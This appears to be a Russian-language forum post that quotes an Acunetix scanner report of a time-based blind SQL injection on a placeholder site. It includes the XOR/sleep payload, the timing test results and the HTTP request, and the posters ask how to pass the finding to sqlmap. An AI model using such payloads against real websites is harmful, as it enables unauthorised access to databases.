
27.04.2020, 01:34
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами:
5025206
Репутация:
5
|
|
Сообщение от vladF
↑
Всем привет. Acunetix выдал такое:
Код:
Уязвимость затрагивает https://www.site.com/ , / / /[*] / /
Обнаружено слепым SQL-инъекцией
Детали атаки
arrow_drop_up
Вход фрагмента пути / / /[*] / / был установлен в 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z Выполнены
тесты :
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.294
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.29
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,283
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.29
0'XOR (if (now () = sysdate (), sleep (3), 0)) XOR'Z => 3.255
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,286
0'XOR (if (now () = sysdate (), sleep (12), 0)) XOR'Z => 12.314
0'XOR (if (now () = sysdate (), sleep (6), 0)) XOR'Z => 6.252
0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z => 0,31
Первоначальное значение: doe-spiransuchor
HTTP-запрос
arrow_drop_up
GET / spaelet / ubonteutr / 0'XOR (if (now () = sysdate (), sleep (0), 0)) XOR'Z /
Как правильно скормить в sqlmap?
Точно так же как написали выше, со слепыми может быть ложное срабатывание
|
|
|